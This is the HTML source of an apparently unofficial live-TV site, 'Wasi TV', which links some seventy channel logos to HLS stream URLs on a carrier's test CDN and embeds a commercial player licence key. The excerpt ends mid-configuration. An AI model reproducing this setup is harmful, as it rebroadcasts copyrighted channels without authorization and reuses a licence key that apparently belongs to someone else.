<html lang="en">
 <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Wasi TV</title>
  <link href="https://niazitv.com/jtv/style.css" rel="stylesheet">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <link href=" https://use.fontawesome.com/releases/v5.0.6/css/all.css" rel="stylesheet">
  <script src="https://s0.2mdn.net/instream/video/client.js" async="" type="text/javascript"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css">
  <style>
   :root {
    --hfs: 2vmax;
    --primaryColor: red;
    --secondaryColor: black;
    --secondaryOpposite: white;
   }

   ::-webkit-scrollbar {
    width: 0em;
    height: 0em;
   }

   ::-webkit-scrollbar-thumb {
    background: var(--secondaryColor);
   }

   ::-webkit-scrollbar-track {
    background: none;
   }

   * {
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
   }

   body {
    background-color: var(--secondaryColor);
   }

   .alignleft {
    float: left;
    margin-left: 5px;
    font-weight: bold;
    font-size: 15px;
   }

   .alignright {
    float: right;
    margin-right: 10px;
    color: var(--primaryColor);
    font-weight: normal;
    font-size: 25px;
   }

   h4 {
    margin-left: 5px;
    color: var(--primaryColor);
    font-weight: bold;
    font-size: 15px;
   }

   .nta {
    position: relative;
    overflow: hidden;
    color: var(--primaryColor);
   }

   div.scrollmenu {
    background-color: var(--secondaryColor);
    overflow: auto;
    white-space: nowrap;
    position: relative;
    overflow-y: hidden;
   }

   div.scrollmenu a {
    display: inline-block;
    color: var(--secondaryOpposite);
    text-align: center;
    padding: 4px;
    text-decoration: none;
   }

   div.scrollmenu a:hover {
    background-color: var(--secondaryColor);
   }

   .cen {
    position: relative;
    text-align: center;
    color: var(--secondaryOpposite);
   }

   .centered {
    font-size: var(--hfs);
    font-weight: bold;
    position: absolute;
    top: 80%;
    left: 50%;
    transform: translate(-50%, -50%);
   }

   .cent {
    font-size: auto;
    position: absolute;
    top: 95%;
    left: 50%;
    transform: translate(-50%, -50%);
   }

   .nt {
    width: 100px;
    border-radius: 10px;
    height: 120px;
    z-index: 1;
   }

   .mnt {
    width: 100px;
    border-radius: 2px;
    height: 100px;
   }

   .item img {
    border-radius: 10px;
   }

   #content-container {
    margin-bottom: 30px;
   }

   footer {
    display: grid;
    grid-gap: 0.5em;
    grid-template-columns: repeat(5, minmax(10px, 1fr));
    position: fixed;
    bottom: 0;
    left: 0;
    width: 100%;
    background-color: var(--secondaryColor);
    padding: 0px 4px 10px;
    justify-content: center;
    align-items: center;
    font-size: 18px;
   }

   footer a {
    text-align: center;
    color: var(--primaryColor);
   }

   footer a:nth-child(3) i {
    background: var(--primaryColor);
    border-radius: 50%;
    padding: 10px 10px;
    color: var(--secondaryOpposite);
    margin-top: -40px;
    border: 2px solid var(--secondaryColor);
   }
  </style>
  <style>
   ::-webkit-scrollbar {
    display: none
   }

   * {
    -ms-overflow-style: none;
    scrollbar-width: none
   }

   body {
    margin: 0;
    background: #f5f5f5;
    font-family: Arial, Helvetica, sans-serif;
    line-height: 1.5;
    color: white;
    scroll-behavior: smooth;
    text-align: center;
   }

   #player-wrapper {
    width: 100%;
    z-index: 999;
   }

   .sticky {
    position: fixed;
    top: 0;
    width: 100%
   }

   #status {
    position: fixed;
    bottom: 0;
    right: 0;
    width: 100%;
    background: #fff;
    display: none;
   }

   .col-sm-2 {
    border-radius: 4px
   }

   .sp {
    width: 50%;
    height: 12px;
    clear: both;
    margin: 20px auto
   }

   .sp-texture {
    border: 1px #000 solid;
    border-radius: 4px;
    position: relative;
    background: linear-gradient(45deg, transparent 49%, #000 50%, #000 50%, transparent 51%, transparent), linear-gradient(-45deg, transparent 49%, #000 50%, #000 50%, transparent 51%, transparent);
    background-size: 16px 16px;
    background-position: 0 0;
    -webkit-animation: spTexture 1s infinite linear;
    animation: spTexture 1s infinite linear;
    color: #000;
    text-align: center;
    line-height: 3em;
    font-family: roboto
   }

   @-webkit-keyframes spTexture {
    from {
     background-position: 0 0
    }

    to {
     background-position: -16px 0
    }
   }

   @keyframes spTexture {
    from {
     background-position: 0 0
    }

    to {
     background-position: -16px 0
    }
   }

   .heading {
    margin: 5px auto;
    text-align: center
   }

   #rmpPlayer {
    z-index: 999
   }

   .white {
    color: #fff
   }

   .red {
    color: red
   }

   .yellow {
    color: #ffdd40
   }

   footer {
    color: #fff;
    text-align: center
   }

   footer p {
    margin-bottom: 20px;
    margin-top: -10px
   }

   .animated {
    font-family: sans;
    margin: 0;
    padding: 0;
    font-size: 25px;
    background: url(https://upload.wikimedia.org/wikipedia/commons/3/3b/ColorRotateHr.gif) no-repeat;
    background-clip: text;
    -webkit-background-clip: text;
    color: transparent;
    animation: moveBg 40s linear infinite;
    -webkit-animation: moveBg 40s linear infinite
   }

   @keyframes moveBg {
    0% {
     background-position: 0 30%
    }

    100% {
     background-position: 100% 50%
    }
   }

   .blink {
    animation-name: blinker;
    animation-duration: 1s;
    animation-timing-function: linear;
    animation-iteration-count: infinite
   }

   @keyframes blinker {
    0% {
     opacity: 1
    }

    50% {
     opacity: 0
    }

    100% {
     opacity: 1
    }
   }

   * {
    -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none
   }

   body {
    background: #000 !important;
    overflow: hidden;
    color: white;
   }

   .parent {
    background: rgba(0, 0, 0, .9);
    font-family: "Source Sans Pro", sans-serif;
    margin: 0;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
    position: fixed;
    top: 0;
    height: 100%;
    width: 100%;
    z-index: 999999
   }

   .blobs-container {
    display: flex
   }

   .blob img {
    width: 50%;
    display: none;
    margin: auto;
    margin-top: 25px
   }

   .loading {
    color: #000;
    display: block;
    text-align: center;
    position: relative;
    top: 30px;
    left: -2px;
    background: rgba(255, 255, 255, .9);
    padding: 0 10px;
    border-radius: 3px;
    width: 80%;
    margin: auto;
    font-size: 10px
   }

   .print {
    height: 65px;
    width: 65px;
    border-radius: 50px;
    border: 1.5px solid #f5f5f5;
    padding: 2px;
    margin: 3px;
   }

   .print:hover {
    height: 90px;
    width: 90px;
    border: 2px solid red;
    border-radius: 5px;
    webkit-box-shadow: 0px 10px 0px 0px rgba(255, 0, 0, 1);
    -moz-box-shadow: 0px 10px 0px 0px rgba(255, 0, 0, 1);
    box-shadow: 0px 3px 20px 3px rgba(255, 0, 0, 100);
   }

   .print:active {
    height: 65px;
    width: 65px;
    border: 2px solid red;
    border-radius: 5px;
    webkit-box-shadow: 0px 10px 0px 0px rgba(0, 255, 0, 1);
    -moz-box-shadow: 0px 10px 0px 0px rgba(0, 255, 0, 1);
    box-shadow: 0px 3px 20px 3px rgba(0, 255, 0, 100);
   }

   marquee {
    border-radius: 0px 0px 0px 0px;
    width: 90%;
    border: 2px solid red;
    margin: auto;
    font-weight: bold;
    color: #fff;
    display: block;
   }

   .marquee span {
    display: inline-block;
    background: #ff0000;
    border-radius: 0px 0px 0px 0px;
    padding: 0px 10px;
    color: #fff;
    padding: 2px;
    font-weight: bold;
    display: inline-block;
    float: left;
    width: auto;
    line-height: 35px;
   }

   .marquee marquee {
    display: block;
    line-height: 35px;
    z-index: -1;
    margin-right: 10px;
    width: auto;
    margin: auto;
   }

   .viewer {
    display: flex;
    width: 70px;
    height: auto;
    padding: 10px;
    vertical-align: middle;
   }

   #count {
    display: flex;
    font-size: 10pt;
    padding: 1px 10px;
    width: 90px;
    background: Red;
    border-radius: 0px;
   }
  </style>
  <link id="rmp-dress-code" type="text/css" rel="stylesheet" href="https://cdn.radiantmediatechs.com/rmp/5.9.2/css/rmp-s4.min.css">
 </head>
 <body style="overflow: auto;">
  <script>
   var src = {
    mp4: ['https://sandl.herokuapp.com/video/video?url=https://m.youtube.com/watch?v=G7Evl8C-WIs'],
    webm: ['https://your-webm-sd-url.webm', 'https://your-webm-hd-url.webm', 'https://your-webm-full-hd-url.webm']
   };
  </script>
  <div class="parent" id="loader" style="display: none;">
   <div class="blobs-container">
    <div class="blob">
     <img id="loader-image" src="">
    </div>
   </div>
  </div>
  <div id="player-wrapper">
   <script src="https://cdn.radiantmediatechs.com/rmp/6.2.0/js/rmp.min.js"></script>
   <!-- Add a div container with a unique id - video and UI elements will be appended to this container -->
   <div id="rmpPlayer"></div>
   <div class="marquee yellow">
    <span>
     <i class="fa fa-bell" style="font-size:26pt" aria-hidden="true"></i>
    </span>
    <marquee scrollamount="5" direction="left" onmouseover="stop()" onmouseout="start()">CREATED BY BABAR ALI COPYRIGHT 2023 ALL RIGHTS RESERVED.ALL CHANNLE IS 100% FREE ON JAZZ NETWORK YOU CAN WATCH ALL CHANNLES WITH 0 MB IF ARE FACING ISSU GO TO SLIDE MENU AND CLICK ON CONTACT US BUTTON TO REPORT YOUR ISSU . THANKS FOR WATCHING F STREAM</marquee>
   </div>
   <h2>
<span url="https://cdn04lhr.tamashaweb.com:8087/tamashatest/ASIA-CUP-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1691225930-logo.png?id=74">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ARYnews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1684242189-logo.png?id=43">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/geoNews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/geo-news-live.png?id=86">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Tensports-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/ten-sports-hd-logo.png?id=74">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ARYdigital-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/ary-digital-live-logo.png?id=81">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/humTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/HUM-TV-Channel-logo.png?id=22">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/GeoEntertainment-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/geo-entertainment-live.png?id=21">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/DHA-source-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1688631993-logo.png?id=71">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/DawnNews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/dawn-news-live.png?id=63">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AAN-TV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1681977574-logo.png?id=55">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/BolEntertainment-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/bol-entertainment-live.png?id=64">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ARYzindagi-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/ary-zindagi-live-logo.png?id=59">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/humnews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/HUM-News-Channel-logo.png?id=100">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/BolNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/bol-news-live.png?id=34">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/expressnews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/express-news-live.png?id=96">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Livecnn-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/cnn-news-live.png?id=49">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/cartoonnetwork-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/cartoon-network-live.png?id=75">
     <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/hummasala-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/HUM-Masala-Channel-logo.png?id=43">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/HumSitaray-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/HUM-Sitaray-Channel-logo.png?id=75">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ExpressEntertainment-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/express-entertainment-live.png?id=43">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/SabTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/1686044497-logo.png?id=97">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Eurosport-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1686912440-logo.png?id=25">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ABNnews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/1686912075-logo.png?id=12">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/TVOne-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/tv-one-live.png?id=66">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Madni-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/madani-channel-live.png?id=67">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/GNN-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/gnn-live.png?id=88">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/filmworld-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/filmworld-live.png?id=48">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Filmax-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/filmax-live.png?id=20">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/KashishTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/kashish-live.png?id=52">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AajNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/aaj-news-live.png?id=83">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Aplus-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/a-plus-live.png?id=21">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/sindhTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/sindh-tv-live.png?id=86">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/LTNFamily-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/ltn-family-live.png?id=62">
     <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/NeoNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/neo-tv-live.png?id=87">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ktnNews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/ktn-news-live.png?id=41">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AroojTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/aruj-live.png?id=32">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/24News-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/channel-24-live.png?id=58">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/SachTV/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/such-tv-live.png?id=56">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/RozNews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/roze-news-live.png?id=77">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/play-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/play-tv-live.png?id=80">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AajEntertainment-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/aaj-entertainment-live.png?id=83">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/DiscoveryPakistan-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/discover-pakistan-live-logo.png?id=21">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/LahoreRung-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/lahore-rang-logo.png?id=65">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/NewsOne-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/news-one-live.png?id=11">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/MehranTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/mehran-tv-logo.png?id=42">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/PublicTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/public-news-live.png?id=28">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/A1TV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/a1-tv-live.png?id=60">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AVTkhyberTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1685537734-logo.png?id=10">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Channel5-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/channel-five-live.png?id=64">
     <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/city42(vnw)-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/city-42-live.png?id=21">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Metro1News-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/metro-1-news-live.png?id=60">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/SindhNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/sindh-tv-news-live.png?id=59">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/AfghanTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/afghan-tv-live.png?id=57">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/TimeNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/time-news-live.png?id=60">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/RohiTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/rohi-live.png?id=58">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/KhyberNews-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1685537412-logo.png?id=90">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/K21-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/k21-news-live.png?id=94">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/SaudiSunnah(NW)-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/saudi-sunnah-madinah-tv-hd-live.png?id=18">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/waseeb-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/waseb-live.png?id=59">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/city41News-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/city41-live.png?id=85">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Saudimakkah(nw)-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/saudi-quran-makkah-tv-hd-live.png?id=78">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/mashriqtv-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/mashriq-tv-live.png?id=88">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/DWNews-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/DW-english-live.png?id=91">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/KohinoorTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/kohenoor-tv-live.png?id=22">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/samaaTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/samaa-tv-live.png?id=91">
     <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/8xm-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/8xm-live.png?id=58">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/ktnEntertainment-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/ktn-entertainment-live.png?id=89">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/urdu-1-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/urdu-1-live.png?id=91">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/BabyTV-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/baby-tv-live.png?id=46">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Apna-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/apna-tv-live.png?id=10">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/abbtak-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/abb-takk-news-live.png?id=17">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/jalwa-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/jalwa-tv-live.png?id=85">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/MovieOne-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/movie-one-live.png?id=23">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/seeTV-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/see-tv-live.png?id=31">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/championtv-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/champion-tv-live.png?id=60">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Kay2-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/1685535127-logo.png?id=69">
    </span>
    <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/PNN-abr/playlist.m3u8">
     <img class="print" id="ptv sports" src="https://jazztv.pk/jazzlive/uploads/channels/logo/pnn-news-live.png?id=18">
      <span url="https://cdn07isb.tamashaweb.com:8087/tamashatest/Pashto1-abr/playlist.m3u8">
     <img name="ptv sports" autofocus="" class="print" id="ptv sports " src="https://jazztv.pk/jazzlive/uploads/channels/logo/HUM-Pashto-Channel-logo.png?id=52">
    </span>
    <span url="your m3u8">
     <img class="print" id="ptv sports" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTkbpAg2Ifqyxu-cdNI3JNXVk9H09LTNziLIw&usqp=CAU">
    </span>
    <span url="your m3u8">
     <img name="ptv sports" autofocus="" class="print" id=" ptv sports " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTkbpAg2Ifqyxu-cdNI3JNXVk9H09LTNziLIw&usqp=CAU">
    </span>
    <span url="your m3u8">
     <img class="print" id="ptv sports" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTkbpAg2Ifqyxu-cdNI3JNXVk9H09LTNziLIw&usqp=CAU">
    </span>
    <script>
     const countEl = document.getElementById('count');
     updateVisitCount();

     function updateVisitCount() {
      fetch('https://api.countapi.xyz/hit/awaispirkale/visits').then(res => res.json()).then(res => {
       countEl.innerHTML = res.value;
      })
     } 
     // SOCIAL PANEL JS
     const floating_btn = document.querySelector('.floating-btn');
     const close_btn = document.querySelector('.close-btn');
     const social_panel_container = document.querySelector('.social-panel-container');
     floating_btn.addEventListener('click', () => {
      social_panel_container.classList.toggle('visible')
     });
    </script>
  </div>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://cdn.radiantmediatechs.com/rmp/5.9.2/js/rmp.min.js"></script>
  <script>
   var appSettings = {
     loaderimg: "",
     name: "PSL Official",
     poster: " https://jazztv.pk/jazzlive/uploads/slider/1691226841.png?id=83",
     introMp4: "https://sandl.herokuapp.com/video/video?url=https://m.youtube.com/watch?v=G7Evl8C-WIs",
     introHls: "ht",
     videoFormat: "mp4",
    },
    x = {
     loaderimg: appSettings.loaderimg,
     name: appSettings.name,
     poster: appSettings.poster,
     website: "",
     licenseKey: "eHp1dXRtb3Z5cEAxNDkyNDI4",
     autoHeightMode: !0,
     pip: !1,
     autoplay: !1,
     skin: "s4",
     hideControls: !0,
     preload: "auto",
